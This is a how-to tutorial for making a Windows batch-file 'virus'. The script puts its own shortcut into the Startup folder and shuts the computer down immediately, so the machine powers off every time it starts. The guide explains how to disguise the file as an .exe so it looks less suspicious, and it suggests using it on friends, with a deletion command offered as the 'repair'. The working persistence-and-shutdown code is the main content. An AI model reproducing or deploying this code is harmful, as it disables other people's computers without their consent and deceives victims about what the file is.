Introduction: How to Make StartUp Auto Shutdown Virus.
This tutorial will teach how to implant a virus that automatically shutdowns computer upon start-up.
Disclaimer:This is not a FAKE. Do not use this on your computer. I am not responsible for any damage done by this program.
Step 1: Open Notepad
Not to hard.
Step 2: While Notepad Is Open, Copy the Following Code:
if not exist ""C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[shortcut_name].lnk" xcopy ".\[shortcut_name].lnk" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /Y
shutdown -s -t 0
[Do not copy anything below here]
Note: Replace [shortcut_name] with the name of the shortcut you will create in Step 4.
Step 3: Save the File. (Do Not Save Immediately. See Step Description First)
While in the Save Dialog, select Type and select All Files... Afterwards, add ".bat" [without quotation] at the end of the file name. You may give it any name you desire.
Step 4: Create a Shortcut of the Created File in the Same Folder.
Also, do not forget to change [shortcut_name] from Step 2.
Step 5: Optional: Make the File Look Less Like a Virused File by Converting It to an Application.
You can try converting it to an app (.exe) by using this program: http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
Step 6: If You Are Going to Use It on Your Friends, Change the 0 After the -t in the Code to 10 or Higher and Create a Repair File.
Change the 0 to 10(or longer(recommended)) in -t to lenghten the shutdown timer. This way, you could go to their house and show them a repair file containing the ff. code(same procedure as virus code except for Step4 and use this code instead):
del "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[shortcut_name].lnk"
[Do Not Copy anything below this]
NOTE: Replace [shortcut_name] with shortcut name.

